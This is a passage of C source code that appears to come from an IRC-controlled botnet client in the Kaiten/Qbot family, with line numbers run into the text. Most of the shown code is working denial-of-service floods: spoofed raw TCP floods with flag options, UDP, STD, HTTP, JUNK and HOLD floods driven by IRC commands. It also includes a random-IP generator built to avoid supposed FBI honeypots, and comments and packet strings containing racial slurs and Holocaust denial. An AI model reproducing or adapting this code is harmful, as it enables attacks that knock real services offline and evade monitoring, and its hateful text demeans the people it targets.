AF_INET;2018send_tcp.ip.ihl = 5;2019send_tcp.ip.version = 4;2020send_tcp.ip.tos = 16;2021send_tcp.ip.frag_off = 64;2022send_tcp.ip.ttl = 64;2023send_tcp.ip.protocol = 6;2024send_tcp.tcp.ack_seq = 0;2025send_tcp.tcp.doff = 10;2026send_tcp.tcp.res1 = 0;2027send_tcp.tcp.urg = 0;2028send_tcp.tcp.ack = 0;2029send_tcp.tcp.psh = 0;2030send_tcp.tcp.syn = 0;2031send_tcp.tcp.fin = 0;2032send_tcp.tcp.rst = 0;2033send_tcp.tcp.urg_ptr = 0;2034if(!strcmp(argv[2], "all")) {2035send_tcp.tcp.syn = 1;2036send_tcp.tcp.rst = 1;2037send_tcp.tcp.fin = 1;2038send_tcp.tcp.ack = 1;2039send_tcp.tcp.psh = 1;2040send_tcp.tcp.urg = 1;2041} else if(!strcmp(argv[2], "xmas")) {2042send_tcp.tcp.fin = 1;2043send_tcp.tcp.psh = 1;2044send_tcp.tcp.urg = 1;2045} else if(!strcmp(argv[2], "usyn")) {2046send_tcp.tcp.syn = 1;2047send_tcp.tcp.urg = 1;2048} else {2049unsigned char *pch = strtok(argv[2], ",");2050while(pch) {2051if(!strcmp(pch, "syn")) { send_tcp.tcp.syn = 1;2052} else if(!strcmp(pch, "rst")) { send_tcp.tcp.rst = 1;2053} else if(!strcmp(pch, "fin")) { send_tcp.tcp.fin = 1;2054} else if(!strcmp(pch, "ack")) { send_tcp.tcp.ack = 1;2055} else if(!strcmp(pch, "psh")) { send_tcp.tcp.psh = 1;2056} else if(!strcmp(pch, "urg")) { send_tcp.tcp.urg = 1;2057} else {2058}2059pch = strtok(NULL, ",");2060}2061}2062send_tcp.tcp.window = 2048;2063send_tcp.ip.daddr = daddr;2064sin.sin_addr.s_addr = send_tcp.ip.daddr;2065send_tcp.ip.check = 0;2066send_tcp.tcp.check = 0;2067pseudo_header.dest_address = send_tcp.ip.daddr;2068pseudo_header.placeholder = 0;20692070while(1) {2071dest = portz[realrand(0, howmanyportz)];2072source=getspoof();2073send_tcp.ip.tot_len = htons(40+psize);2074send_tcp.ip.id = rand();2075send_tcp.ip.saddr = source;2076send_tcp.ip.daddr = daddr;2077send_tcp.tcp.source = source;2078send_tcp.tcp.dest = dest;2079send_tcp.tcp.seq = rand();2080sin.sin_port = dest;2081sin.sin_addr.s_addr = send_tcp.ip.daddr;2082send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);2083check = rand();2084send_tcp.buf[9]=((char*)&check)[0];2085send_tcp.buf[10]=((char*)&check)[1];2086send_tcp.buf[11]=((char*)&check)[2];2087send_tcp.buf[12]=((char*)&check)[3];2088pseudo_header.source_address = send_tcp.ip.saddr;2089pseudo_header.protocol = IPPROTO_TCP;2090pseudo_header.tcp_length = htons(20+psize);2091bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);2092bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);2093send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);2094sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));2095if(a >= 100) {2096if(time(NULL) >= start+secs) exit(0);2097a=0;2098}2099a++;2100}2101close(get);2102exit(0);2103}21042105void makeRandomShit(unsigned char *buf, int length) {2106srand(time(NULL));2107int i = 0;2108for(i = 0; i < length; i++) buf[i] = (rand() % 255) + 1;2109}21102111void unknown(int sock, char *sender, int argc, char **argv) {2112/*2113Non spoof UDP flooder modded by Freak/SynthMesc2114Now has port and packetsize options2115and an option for random port and packetsize! (just enter 0)2116Each packet is unique!2117Cheers homies.2118only shout iz here and it is to:2119kod for all the help you gave me and showing me kaiten in the first place!2120luv u bb <32121*/2122int fd,i,packetsize,index;2123// int flag = 1;2124int randport = 0;2125int randsize = 0;2126unsigned long secs;2127struct hostent *hp;2128struct sockaddr_in in;2129time_t start = time(NULL);2130char *packsize;21312132if(argc < 4) {2133Send(sock, "NOTICE %s :UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs>\n", sender);2134exit(1);2135}21362137if(mfork(sender) != 0) return;21382139unsigned char *packet = malloc(1024);2140memset(packet, 0, 1024);21412142if(!strcmp(argv[2],"0")) {2143randport = 1;2144}21452146if(!strcmp(argv[3],"0")) {2147randsize = 1;2148packsize = "random";2149} else {2150packsize = argv[3];2151}21522153srand(time(NULL));21542155secs=atol(argv[4]);2156memset((void*)&in,0,sizeof(struct sockaddr_in));21572158in.sin_addr.s_addr=host2ip(sender,argv[1]);2159in.sin_family = AF_INET;21602161if(randport == 0) {2162in.sin_port = htons(atoi(argv[2]));2163packsize = argv[3];2164}21652166Send(sock, "NOTICE %s :Unknowning %s:%s with packet size %s\n", sender, argv[1], argv[2], packsize);2167while(1) {2168if(randport == 1) {2169in.sin_port = htons(realrand(1026, 65535));2170}21712172if(randsize == 1) {2173makeRandomShit(packet, realrand(64, 1024));2174} else {2175makeRandomShit(packet, atoi(argv[3]));2176}21772178if((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);2179else {2180// ioctl(fd, FIONBIO, &flag); whoever did this was fucking retarded lmao2181sendto(fd, packet, strlen(packet), 0, (struct sockaddr*)&in, sizeof(in));2182close(fd);2183}2184if(i >= 100) {2185if(time(NULL) >= start+secs) {2186break;2187} else {2188i=0;2189}2190}2191i++;2192}2193close(fd);2194exit(0);2195}21962197int listFork() {2198uint32_t parent, *newpids, i;2199parent = fork();2200if(parent <= 0) return parent;2201numpids++;2202newpids = (uint32_t*)malloc((numpids + 1) * 4);2203for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];2204newpids[numpids - 1] = parent;2205free(pids);2206pids = newpids;2207return parent;2208}220922102211void SendTheSTD(unsigned char *ip, int port, int secs) { // Faster STD attack with absolutely fucking hilarious packets. Modded by Freak2212int iSTD_Sock;2213iSTD_Sock = socket (AF_INET, SOCK_DGRAM, 0);2214time_t start = time (NULL);2215struct sockaddr_in sin;2216struct hostent *hp;2217hp = gethostbyname (ip);2218bzero ((char *) &sin, sizeof (sin));2219bcopy (hp->h_addr, (char *) &sin.sin_addr, hp->h_length);2220sin.sin_family = hp->h_addrtype;2221char *STD_STRING = "KEKSTD"; // this value never gets sent. just a placeholder. lawl2222unsigned int a = 0;2223int targetPort;2224char *randstrings[] = {2225"std", "dts", "lsk",2226"kek", "smack", "ily",2227"tfw no gf", "frienzoned",2228"tyf", "pos", "cunts", "NullzSec", "NullzSec rox", "NullzSec ROX",2229"get raped", "not a ddos packet", "also not a ddos packet", "seriously not a ddos packet",2230"GET / HTTP/1.1\r\nHost: goatse.info\r\n\r\n", "GET / HTTP/1.1\r\nHost: tubgirl.ca\r\n\r\n",2231"GET / HTTP/1.0\r\nHost: goatse.info\r\n\r\n", "GET / HTTP/1.0\r\nHost: tubgirl.ca\r\n\r\n",2232"8======D~~~~~~~","suck it", "give succ",2233"big nigger dick 8============================D", "( . Y . ) tiddies",2234"bigNullz", "eye pee rape", "eye pee address rape", "IP rape", "eye pee address rape",2235"This is LOIC", "LOIC", "HOIC", "XOIC", "LHXOIC", "A cat is fine too. Desudesudesu~", // LOIC packets. KEKEK2236"the biiiiig pussy", "benis" , "penis", "dick", "vagina", "clitoris", "pussy", "tfw", ":^}", "dic pic?", "send nudes",2237"https://youtu.be/dQw4w9WgXcQ", "Never gonna give you up",2238"Never gonna make you cry", "Never gonna let you die", "Never gonna hurt you",2239"bush did 9/11", "jet fuel can't melt steel beams", "9/11 was an inside job",2240"the illuminati is real", "wake up sheep", "i flex like david ike", "6 million jews? show me the proof!",2241"T R I G G E R E D", "my gf killed herself", "free masons suck cock", "ihatejews", "urgay", "tfw u like dick", "dickbutt",2242"The elusive dickbut", "Heyyy that's pretty gooood", "NSA sucks cock", "FBI sucks cock", "You name it they suck cock"2243"What am I doing with my life", "Oh yeah I like nulling shit", "HIIYYOOOOOOO (Customgrow420)", "Keemstar is a fucking knome", "Leafy is gawd <3",2244"Ourmine is full of skids", "STC is the greatest"2245};2246while(1) {2247if(port == 0) {2248targetPort = realrand(1, 65535);2249} else {2250targetPort = port;2251}2252STD_STRING = randstrings[rand () % (sizeof (randstrings) / sizeof (char *))];2253sin.sin_port = targetPort;2254connect(iSTD_Sock, (struct sockaddr *) &sin, sizeof (sin));2255send(iSTD_Sock, STD_STRING, strlen(STD_STRING), 0);2256if(a >= 100) {2257if(time(NULL) >= start + secs) {2258close(iSTD_Sock);2259_exit(0);2260}2261a = 0;2262}2263a++;22642265}2266}22672268void sendSTD(int sock, char *sender, int argc, char **argv) {2269//!* STD TARGET PORT TIME2270if(mfork(sender) != 0) return;2271if(argc < 3) {2272Send(sock, "NOTICE %s :STD <ip> <port> <time>\n", sender);2273exit(1);2274}2275unsigned char *ip = argv[1];2276int port = atoi(argv[2]);2277int time = atoi(argv[3]);2278if(strstr(ip, ",") != NULL) {2279unsigned char *hi = strtok(ip, ",");2280while(hi != NULL) {2281if(!listFork()) {2282Send(sock, "NOTICE %s :STD attacking %s:%s\n", sender,hi,argv[2]);2283SendTheSTD(hi, port, time);2284_exit(0);2285}2286hi = strtok(NULL, ",");2287}2288} else {2289if(listFork()) {2290exit(1);2291}2292Send(sock, "NOTICE %s :STD attacking %s:%s\n", sender,argv[1],argv[2]);2293SendTheSTD(ip, port, time);2294_exit(0);2295}2296}22972298struct sa_in {2299unsigned short int sin_family, sin_port;2300struct {2301unsigned int s_addr;2302}2303sin_addr;2304unsigned char sin_zero[8];2305};23062307int get_iface_ip(struct sockaddr_in *ip, char *iface)2308{2309int fd;2310struct ifreq ifr;2311fd = socket(AF_INET, SOCK_DGRAM, 0);2312ifr.ifr_addr.sa_family = AF_INET;2313strncpy(ifr.ifr_name, iface, IFNAMSIZ - 1);2314int ret = ioctl(fd, SIOCGIFADDR, &ifr);2315if(ret != 0)2316{2317return 0;2318}2319close(fd);2320ip->sin_family = AF_INET;2321ip->sin_addr = ((struct sockaddr_in*)&ifr.ifr_addr)->sin_addr;2322return 1;2323}23242325int getHost(unsigned char *toGet, struct in_addr *i) {2326struct hostent *h;2327if((i->s_addr = inet_addr(toGet)) == -1) return 1;2328return 0;2329}23302331void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {2332iph->ihl = 5;2333iph->version = 4;2334iph->tos = 0;2335iph->tot_len = sizeof(struct iphdr) + packetSize;2336iph->id = rand_cmwc();2337iph->frag_off = 0;2338iph->ttl = MAXTTL;2339iph->protocol = protocol;2340iph->check = 0;2341iph->saddr = source;2342iph->daddr = dest;2343}23442345struct tcp_thread_data{2346unsigned char *target;2347int port;2348int secs;2349unsigned char *flags;2350int packetsize;2351int pollinterval;2352int spoofit;2353};23542355static void printchar(unsigned char **str, int c) {2356if(str) {2357**str = c;2358++(*str);2359}2360else (void)write(1, &c, 1);2361}2362static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {2363register int pc = 0, padchar = ' ';2364if(width > 0) {2365register int len = 0;2366register const unsigned char *ptr;2367for (ptr = string; *ptr; ++ptr) ++len;2368if(len >= width) width = 0;2369else width -= len;2370if(pad & PAD_ZERO) padchar = '0';2371}2372if(!(pad & PAD_RIGHT)) {2373for ( ; width > 0; --width) {2374printchar (out, padchar);2375++pc;2376}2377}2378for ( ; *string ; ++string) {2379printchar (out, *string);2380++pc;2381}2382for ( ; width > 0; --width) {2383printchar (out, padchar);2384++pc;2385}2386return pc;2387}2388static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {2389unsigned char print_buf[PRINT_BUF_LEN];2390register unsigned char *s;2391register int t, neg = 0, pc = 0;2392register unsigned int u = i;2393if(i == 0) {2394print_buf[0] = '0';2395print_buf[1] = '\0';2396return prints (out, print_buf, width, pad);2397}2398if(sg && b == 10 && i < 0) {2399neg = 1;2400u = -i;2401}24022403s = print_buf + PRINT_BUF_LEN-1;2404*s = '\0';2405while(u) {2406t = u % b;2407if( t >= 10 )2408t += letbase - '0' - 10;2409*--s = t + '0';2410u /= b;2411}2412if(neg) {2413if( width && (pad & PAD_ZERO) ) {2414printchar (out, '-');2415++pc;2416--width;2417}2418else {2419*--s = '-';2420}2421}24222423return pc + prints (out, s, width, pad);2424}2425static int print(unsigned char **out, const unsigned char *format, va_list args ) {2426register int width, pad;2427register int pc = 0;2428unsigned char scr[2];2429for (; *format != 0; ++format) {2430if(*format == '%') {2431++format;2432width = pad = 0;2433if(*format == '\0') break;2434if(*format == '%') goto out;2435if(*format == '-') {2436++format;2437pad = PAD_RIGHT;2438}2439while(*format == '0') {2440++format;2441pad |= PAD_ZERO;2442}2443for ( ; *format >= '0' && *format <= '9'; ++format) {2444width *= 10;2445width += *format - '0';2446}2447if( *format == 's' ) {2448register char *s = (char *)va_arg( args, int );2449pc += prints (out, s?s:"(null)", width, pad);2450continue;2451}2452if( *format == 'd' ) {2453pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');2454continue;2455}2456if( *format == 'x' ) {2457pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');2458continue;2459}2460if( *format == 'X' ) {2461pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');2462continue;2463}2464if( *format == 'u' ) {2465pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');2466continue;2467}2468if( *format == 'c' ) {2469scr[0] = (unsigned char)va_arg( args, int );2470scr[1] = '\0';2471pc += prints (out, scr, width, pad);2472continue;2473}2474}2475else {2476out:2477printchar (out, *format);2478++pc;2479}2480}2481if(out) **out = '\0';2482va_end( args );2483return pc;2484}24852486int szprintf(unsigned char *out, const unsigned char *format, ...) {2487va_list args;2488va_start( args, format );2489return print( &out, format, args );2490}24912492char *thanks = "thanks to unhappygh0st for the honeypot ip ranges :)";24932494in_addr_t getRandomPublicIP()2495{2496uint8_t ipState[4] = {0};2497ipState[0] = rand() % 224;2498ipState[1] = rand() % 255;2499ipState[2] = rand() % 255;2500ipState[3] = rand() % 255;25012502while(2503(ipState[0] == 0) ||2504(ipState[0] == 10) ||2505(ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||2506(ipState[0] == 127) ||2507(ipState[0] == 169 && ipState[1] == 254) ||2508(ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||2509(ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||2510(ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||2511(ipState[0] == 192 && ipState[1] == 168) ||2512(ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||2513(ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||2514(ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||2515(ipState[0] == 62 && ipState[1] <= 30) || //Honeypot2516(ipState[0] == 207 && ipState[1] >= 31 && ipState[2] <= 120) || //FBI Honeypots (207.31.0.0 - 207.120.255.255)2517(ipState[0] == 65 ) && (ipState[1] >= 224) && (ipState[2] <= 226) || // More FBI Honeypots (64.224.0.0 - 64.226.255.255)2518(ipState[0] == 195) && (ipState[1] == 10) || //Yet another FBI Honeypot.2519(ipState[0] == 216) && (ipState[1] == 25 || ipState[1] == 94) || //Fucking nigger LOL (FBI Honeypots)2520(ipState[0] == 212) && (ipState[1] == 56) //The fuck?! 212.56.107.22 - uhhhhm. FBI Honeypot.2521)2522{2523ipState[0] = rand() % 224;2524ipState[1] = rand() % 255;2525ipState[2] = rand() % 255;2526ipState[3] = rand() % 255;2527}25282529char ip[16] = {0};2530szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);2531return inet_addr(ip);2532}25332534void SendTCP(void *par1) {2535if(listFork()) return;2536struct tcp_thread_data *td = (struct thread_data *)par1;2537unsigned char *target = td->target;2538int port = td->port;2539int timeEnd = td->secs;2540unsigned char *flags = td->flags;2541int packetsize = td->packetsize;2542int pollinterval = td->pollinterval;2543int spoofit = td->spoofit;25442545register unsigned int pollRegister;2546pollRegister = pollinterval;2547struct sockaddr_in dest_addr;2548dest_addr.sin_family = AF_INET;2549if(port == 0) dest_addr.sin_port = rand_cmwc();2550else dest_addr.sin_port = htons(port);2551if(getHost(target, &dest_addr.sin_addr)) return;2552memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);2553int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);2554if(!sockfd) { return; }2555int tmp = 1;2556if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { return; }2557in_addr_t netmask;2558if( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );2559else netmask = ( ~((1 << (32 - spoofit)) - 1) );2560unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];2561struct iphdr *iph = (struct iphdr *)packet;2562struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);2563makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getspoof() ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);2564tcph->source = rand_cmwc();2565tcph->seq = rand_cmwc();2566tcph->ack_seq = 0;2567tcph->doff = 5;2568if(!strcmp(flags, "all")) {2569tcph->syn = 1;2570tcph->rst = 1;2571tcph->fin = 1;2572tcph->ack = 1;2573tcph->psh = 1;2574tcph->urg = 1;2575} else if(!strcmp(flags, "xmas")) {2576tcph->fin = 1;2577tcph->psh = 1;2578tcph->urg = 1;2579} else if(!strcmp(flags, "usyn")) {2580tcph->syn = 1;2581tcph->urg = 1;2582} else {2583unsigned char *pch = strtok(flags, ",");2584while(pch) {2585if(!strcmp(pch, "syn")) { tcph->syn = 1;2586} else if(!strcmp(pch, "rst")) { tcph->rst = 1;2587} else if(!strcmp(pch, "fin")) { tcph->fin = 1;2588} else if(!strcmp(pch, "ack")) { tcph->ack = 1;2589} else if(!strcmp(pch, "psh")) { tcph->psh = 1;2590} else if(!strcmp(pch, "urg")) { tcph->urg = 1;2591} else {2592}2593pch = strtok(NULL, ",");2594}2595}2596tcph->window = 2048;2597tcph->check = 0;2598tcph->urg_ptr = 0;2599tcph->dest = (port == 0 ? rand_cmwc() : htons(port));2600tcph->check = csum(iph, tcph);2601iph->check = csum ((unsigned short *) packet, iph->tot_len);2602int end = time(NULL) + timeEnd;2603register unsigned int i = 0;2604while(1) {2605sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));2606iph->saddr = getspoof();2607iph->id = rand_cmwc();2608tcph->seq = rand_cmwc();2609tcph->source = rand_cmwc();2610tcph->check = 0;2611tcph->check = csum(iph, tcph);2612iph->check = csum ((unsigned short *) packet, iph->tot_len);2613if(i == pollRegister) {2614if(time(NULL) > end) break;2615i = 0;2616continue;2617}2618i++;2619}2620}26212622void tcpflood(int sock, char *sender, int argc, char **argv) { // Advanced TCP flooder. Multithreading/SynthMesc.2623if(mfork(sender) != 0) return;2624if(argc < 7 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || (argc > 5 && atoi(argv[5]) < 0) || (argc == 7 && atoi(argv[6]) < 1)) {2625Send(sock, "NOTICE %s :TCP <target> <port> <time> <flags/method> <packetsize> <pollinterval> <threads>\n", sender);2626return;2627}2628unsigned char *ip = argv[1];2629int port = atoi(argv[2]);2630int time = atoi(argv[3]);2631unsigned char *flags = argv[4];2632int packetsize = argc > 5 ? atoi(argv[5]) : 0;2633int pollinterval = argc == 7 ? atoi(argv[6]) : 10;2634int num_threads = atoi(argv[7]);2635int spoofed = 32;2636struct sockaddr_in sin;2637sin.sin_family = AF_INET;2638sin.sin_addr.s_addr = inet_addr(argv[1]);2639struct tcp_thread_data td[num_threads];2640unsigned char *hi = strtok(ip, ",");2641int i;2642for(i = 0; i < num_threads - 1; i++){2643td[i].target = i;2644td[i].port = port;2645td[i].secs = time;2646td[i].flags = flags;2647td[i].packetsize = packetsize;2648td[i].pollinterval = pollinterval;2649td[i].spoofit = spoofed;2650SendTCP((void *) &td[i]);2651}2652Send(sock, "NOTICE %s :TCP flooding %s:%d with %s and %d threads\n", sender, hi, port, flags, num_threads);2653sleep(time);2654exit(0);2655}26562657int socket_connect(char *host, unsigned short int port) {2658struct hostent *hp;2659struct sockaddr_in addr;2660int on = 1, sock;2661if((hp = gethostbyname(host)) == NULL) return 0;2662bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);2663addr.sin_port = htons(port);2664addr.sin_family = AF_INET;2665sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);2666setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));2667if(sock == -1) return 0;2668if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;2669return sock;2670}26712672// HTTP Flood2673void sendHTTP(void *host, char *method, int port, char *path, int timeFoo, int power){2674const char *connections[] = { "close", "keep-alive", "accept" };2675int i, timeEnd = time (NULL) + timeFoo;2676char request[1024];2677char *myUA = UserAgents[(rand () % NUMITEMS(UserAgents))];2678char *myCon = connections[(rand () % 3)];2679int myLen = 55 + strlen(method) + strlen(path) + strlen(myUA) + strlen(myCon);2680if(myLen >= 1024) {2681return;2682}2683snprintf(request, myLen,2684"%s %s HTTP/1.1\r\nAccept: */*\r\nUser-Agent: %s\r\nConnection: %s\r\n\r\n",2685method, path, myUA,2686myCon);2687for (i = 0; i < power; i++) {2688if(fork ()) {2689while(timeEnd > time (NULL)) {2690int socket = socket_connect(host, port);2691if(socket != 0) {2692write(socket, request, strlen(request));2693close(socket);2694}2695}2696_exit (1);2697}2698}2699}27002701void *HTTP(int sock, char *sender, int argc, char **argv) {27022703// !* HTTP METHOD TARGET PORT PATH TIME POWER2704// !* HTTP GET hackforums.net 80 / 10 1002705if(mfork(sender) != 0) return;2706if(argc < 6) {2707Send(sock, "NOTICE %s :HTTP <method> <target> <port> <path> <time> <power>\n", sender);2708}2709Send(sock, "NOTICE %s :HTTP %s flooding %s with %d power\n", sender, argv[2], atoi(argv[6]));2710if(strstr ((const char *) argv[1], ",") != NULL) {2711unsigned char *hi = (unsigned char *) strtok ((char *) argv[1], ",");2712while(hi != NULL) {2713if(!listFork ()) {2714sendHTTP (argv[1], argv[2],2715atoi(argv[3]), argv[4],2716atoi(argv[5]), atoi(argv[6]));2717_exit (0);2718}2719hi = (unsigned char *) strtok (NULL, ",");2720}2721} else {2722if(listFork ()) {2723return;2724}2725sendHTTP (argv[1], argv[2],2726atoi(argv[3]), argv[4],2727atoi(argv[5]), atoi(argv[6]));2728_exit (0);2729}2730}27312732// __ __ ___ _ _2733// \ \ /\ /\ /\ \ \/\ /\ / __\ | ___ ___ __| |2734// \ \/ / \ \/ \/ / //_/ / _\ | |/ _ \ / _ \ / _` |2735// /\_/ /\ \_/ / /\ / __ \ / / | | (_) | (_) | (_| |2736// \___/ \___/\_\ \/\/ \/ \/ |_|\___/ \___/ \__,_|27372738void sendJUNK(unsigned char *ip, int port, int end_time)2739{27402741int max = getdtablesize() / 2, i;27422743struct sockaddr_in dest_addr;2744dest_addr.sin_family = AF_INET;2745dest_addr.sin_port = htons(port);2746if(getHost(ip, &dest_addr.sin_addr)) return;2747memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);27482749struct state_t2750{2751int fd;2752uint8_t state;2753} fds[max];2754memset(fds, 0, max * (sizeof(int) + 1));27552756fd_set myset;2757struct timeval tv;2758socklen_t lon;2759int valopt, res;27602761unsigned char *watwat = malloc(1024);2762memset(watwat, 0, 1024);2763int packetLen = 1024;27642765int end = time(NULL) + end_time;2766while(end > time(NULL))2767{2768for(i = 0; i < max; i++)2769{2770switch(fds[i].state)2771{2772case 0:2773{2774fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);2775fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);2776if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);2777else fds[i].state = 1;2778}2779break;27802781case 1:2782{2783FD_ZERO(&myset);2784FD_SET(fds[i].fd, &myset);2785tv.tv_sec = 0;2786tv.tv_usec = 10000;2787res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);2788if(res == 1)2789{2790lon = sizeof(int);2791getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);2792if(valopt)2793{2794close(fds[i].fd);2795fds[i].state = 0;2796} else {2797fds[i].state = 2;2798}2799} else if(res == -1)2800{2801close(fds[i].fd);2802fds[i].state = 0;2803}2804}2805break;28062807case 2:2808{2809//nonblocking sweg2810packetLen = realrand(32, 1024);2811makeRandomShit(watwat, packetLen);2812if(send(fds[i].fd, watwat, packetLen, MSG_NOSIGNAL) == -1 && errno != EAGAIN)2813{2814close(fds[i].fd);2815fds[i].state = 0;2816}2817}2818break;2819}2820}2821}2822}28232824char *junk(int sock, char *sender, int argc, char **argv) {2825if(argc < 3 || atoi(argv[3]) < 0) {2826Send(sock, "NOTICE %s :JUNK <ip> <port> <time>\n", sender);2827return;2828}2829if(mfork(sender) != 0) return;2830Send(sock, "NOTICE %s :JUNK flooding %s:%s\n", sender, argv[1], argv[2]);2831sendJUNK(argv[1], atoi(argv[2]), atoi(argv[3]));2832}28332834// _ _ ___ _ _2835// /\ /\___ | | __| | / __\ | ___ ___ __| |2836// / /_/ / _ \| |/ _` | / _\ | |/ _ \ / _ \ / _` |2837// / __ / (_) | | (_| | / / | | (_) | (_) | (_| |2838// \/ /_/ \___/|_|\__,_| \/ |_|\___/ \___/ \__,_|28392840void sendHOLD(unsigned char *ip, int port, int end_time)2841{28422843int max = getdtablesize() / 2, i;28442845struct sockaddr_in dest_addr;2846dest_addr.sin_family = AF_INET;2847dest_addr.sin_port = htons(port);2848if(getHost(ip, &dest_addr.sin_addr)) return;2849memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);28502851struct state_t2852{2853int fd;2854uint8_t state;2855} fds[max];2856memset(fds, 0, max * (sizeof(int) + 1));28572858fd_set myset;2859struct timeval tv;2860socklen_t lon;2861int valopt, res;28622863int end = time(NULL) + end_time;2864while(end > time(NULL))2865{2866for(i = 0; i < max; i++)2867{2868switch(fds[i].state)2869{2870case 0:2871{2872fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);2873fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);2874if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);2875else fds[i].state = 1;2876}2877break;28782879case 1:2880{2881FD_ZERO(&myset);2882FD_SET(fds[i].fd, &myset);2883tv.tv_sec = 0;2884tv.tv_usec = 10000;2885res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);2886if(res == 1)2887{2888lon = sizeof(int);2889getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);2890if(valopt)2891{2892close(fds[i].fd);2893fds[i].state = 0;2894} else {2895fds[i].state = 2;2896}2897} else if(res == -1)2898{2899close(fds[i].fd);2900fds[i].state = 0;2901}2902}2903break;29042905case 2:2906{2907FD_ZERO(&myset);2908FD_SET(fds[i].fd, &myset);2909tv.tv_sec = 0;2910tv.tv_usec = 10000;2911res = select(fds[i].fd+1, NULL, NULL, &myset, &tv);2912if(res != 0)2913{2914close(fds[i].fd);2915fds[i].state = 0;2916}2917}2918break;2919}2920}2921}2922}29232924char *hold(int sock, char *sender, int argc, char **argv) {2925if(argc < 3 || atoi(argv[3]) < 0) {2926Send(sock, "NOTICE %s :HOLD <ip> <port> <time>\n", sender);2927return;2928}2929if(mfork(sender) != 0) return;2930Send(sock, "NOTICE %s :HOLD flooding %s:%s\n", sender, argv[1], argv[2]);2931sendHOLD(argv[1], atoi(argv[2]), atoi(argv[3]));2932}29332934const char* get_ipstate_host(struct ipstate_t* ipstate)2935{2936struct in_addr in_addr_ip;2937in_addr_ip.s_addr = ipstate->ip;2938return inet_ntoa(in_addr_ip);2939}29402941int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)2942{2943int num_bytes, i;2944memset(buffer, 0, buf_size);2945num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);29462947if(buffer[0] == 0xFF)2948{2949negotiate(fd, buffer, 3);2950}29512952if(contains_string(buffer, strings))2953{2954return 1;2955}29562957return 0;2958}2959int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size)2960{2961fd_set read_set;2962struct timeval tv;2963tv.tv_sec = 0;2964tv.tv_usec = timeout_usec;29652966FD_ZERO(&read_set);2967FD_SET(fd, &read_set);29682969if(select(fd+1, &read_set, NULL, NULL, &tv) < 1)2970return 0;29712972return recv(fd, buffer, buf_size, 0);2973}2974void advance_state(struct ipstate_t* ipstate, int new_state)2975{2976if(new_state == 0)2977{2978close(ipstate->fd);2979}29802981ipstate->totalTimeout = 0;2982ipstate->state = new_state;2983memset((ipstate->sockbuf), 0, BUFFER_SIZE);2984}29852986void reset_ipstate(struct ipstate_t* ipstate)2987{2988advance_state(ipstate, 0);2989ipstate->complete = 1;2990}2991int contains_success(char* buffer)2992{2993return contains_string(buffer, successes);2994}2995int contains_fail(char* buffer)2996{2997return contains_string(buffer, fails);2998}2999int contains_response(char* buffer)3000{3001return contains_success(buffer) || contains_fail(buffer);3002}3003int contains_string(char* buffer, char** strings)3004{3005int num_strings = 0, i = 0;30063007for(num_strings = 0; strings[++num_strings] != 0; );30083009for(i = 0; i < num_strings; i++)3010{3011if(strcasestr(buffer, strings[i]))3012{3013return 1;3014}3015}30163017return 0;3018}30193020int connectTimeout(int fd, char *host, int port, int 